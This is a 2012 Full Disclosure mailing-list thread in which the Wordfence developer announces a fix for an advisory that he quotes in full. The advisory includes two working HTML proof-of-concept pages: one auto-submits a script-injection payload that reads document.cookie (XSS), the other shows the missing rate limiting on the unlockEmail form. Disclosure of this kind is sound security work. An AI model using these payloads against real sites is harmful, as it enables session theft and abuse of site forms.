Full Disclosure mailing list archives
Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress
From: Mark Maunder <mmaunder () gmail com>
Date: Fri, 19 Oct 2012 20:09:20 +0200
This has been fixed and the release just went out. Version 3.3.7. The email param is now escaped and we've added rate limiting to the form with a 3 minute backoff if the limit is exceeded. http://wordpress.org/extend/plugins/wordfence/changelog/ Thanks for your report. Regards, Mark Maunder. On Fri, Oct 19, 2012 at 7:16 PM, MustLive <mustlive () websecurity com ua>wrote:
Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence - it's security plugin for WordPress. ------------------------- Affected products: ------------------------- Vulnerable are Wordfence Security 3.3.5 and previous versions. ---------- Details: ---------- XSS (WASC-08): Wordfence Security XSS.html <html> <head> <title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="<script>alert(document.cookie)</script>"> </form> </body> </html> Insufficient Anti-automation (WASC-21): Wordfence Security IAA.html <html> <head> <title>Wordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="admin () e-mail com"> </form> </body> </html> I've informed the plugin developer about vulnerabilities. And mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6106/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- Mark Maunder <mmaunder () gmail com> France: (+33) 068-700-8029
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 19)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Troy Rose (Oct 24)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Mark Maunder (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 26)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)